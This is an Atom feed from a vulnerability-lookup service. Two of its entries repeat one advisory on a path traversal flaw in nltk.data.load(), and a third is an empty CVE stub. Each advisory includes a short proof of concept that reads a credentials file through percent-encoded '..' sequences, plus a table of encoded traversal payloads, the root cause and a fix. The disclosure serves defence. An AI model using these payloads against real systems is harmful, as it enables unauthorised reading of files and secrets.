<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-03T06:38:39.881553+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/brew-acronym-cve-2026-12243</id>
    <title>BREW-acronym-CVE-2026-12243 — nltk: Arbitrary File Read via Path Traversal in nltk.data.load() through Percent-Encoded Sequences</title>
    <updated>2026-10-03T06:38:39.899083+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Homebrew: acronym</p>
<p># Summary
nltk.data.load() and nltk.data.find() resolve user-supplied resource names to filesystem paths using url2pathname(), which decodes percent-encoded sequences (e.g. %2e%2e to ..). Path safety checks are performed on the raw, still-encoded string before decoding occurs. An attacker supplying %2e%2e instead of .. bypasses all path validation and reads arbitrary files outside the NLTK data directory.</p>
<p># Vulnerable Code
nltk/data.py - find() function:
 url2pathname() decodes %2e%2e -&gt; .. AFTER any safety check
p = os.path.join(path_, url2pathname(resource_name))
if os.path.exists(p):
    return FileSystemPathPointer(p)</p>
<p># Proof of Concept
import nltk.data
nltk.data.path = ["/home/user/nltk_data"]
%2e%2e decodes to .. via url2pathname(), escaping the data dir
data = nltk.data.load("%2e%2e/SECRET_credentials.txt", format="raw")
print(data)
 b'AWS_SECRET_KEY=AKIAIOSFODNN7EXAMPLE\nDATABASE_PASS=hunter2\n'
All of these bypass path checks and decode identically:</p>
<p># Payload	After url2pathname()
%2e%2e/secret	../secret
.%2e/secret	../secret
%2e./secret	../secret
%2E%2E/secret	../secret
Root Cause
url2pathname() is called after path safety checks, not before. Encoding .. as %2e%2e passes every check, then decodes to a traversal sequence at filesystem access time.</p>
<p># Fix
Decode before checking:</p>
<p>from urllib.parse import unquote
resource_name = unquote(resource_name)  # decode first, then validate</p>
<p># Impact
An attacker who controls the resource name passed to nltk.data.load() can r…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/brew-acronym-cve-2026-12243"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/cve-2026-12243</id>
    <title>CVE-2026-12243</title>
    <updated>2026-10-03T06:38:39.899166+00:00</updated>
    <content>CVE-2026-12243</content>
    <link href="https://cve.radiocsirt.org/vuln/cve-2026-12243"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-m42h-3232-vpv3</id>
    <title>GHSA-m42h-3232-vpv3 — nltk: Arbitrary File Read via Path Traversal in nltk.data.load() through Percent-Encoded Sequences</title>
    <updated>2026-10-03T06:38:39.899186+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> PyPI: nltk</p>
<p># Summary
nltk.data.load() and nltk.data.find() resolve user-supplied resource names to filesystem paths using url2pathname(), which decodes percent-encoded sequences (e.g. %2e%2e to ..). Path safety checks are performed on the raw, still-encoded string before decoding occurs. An attacker supplying %2e%2e instead of .. bypasses all path validation and reads arbitrary files outside the NLTK data directory.</p>
<p># Vulnerable Code
nltk/data.py - find() function:
 url2pathname() decodes %2e%2e -&gt; .. AFTER any safety check
p = os.path.join(path_, url2pathname(resource_name))
if os.path.exists(p):
    return FileSystemPathPointer(p)</p>
<p># Proof of Concept
import nltk.data
nltk.data.path = ["/home/user/nltk_data"]
%2e%2e decodes to .. via url2pathname(), escaping the data dir
data = nltk.data.load("%2e%2e/SECRET_credentials.txt", format="raw")
print(data)
 b'AWS_SECRET_KEY=AKIAIOSFODNN7EXAMPLE\nDATABASE_PASS=hunter2\n'
All of these bypass path checks and decode identically:</p>
<p># Payload	After url2pathname()
%2e%2e/secret	../secret
.%2e/secret	../secret
%2e./secret	../secret
%2E%2E/secret	../secret
Root Cause
url2pathname() is called after path safety checks, not before. Encoding .. as %2e%2e passes every check, then decodes to a traversal sequence at filesystem access time.</p>
<p># Fix
Decode before checking:</p>
<p>from urllib.parse import unquote
resource_name = unquote(resource_name)  # decode first, then validate</p>
<p># Impact
An attacker who controls the resource name passed to nltk.data.load() can r…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-m42h-3232-vpv3"/>
  </entry>
</feed>
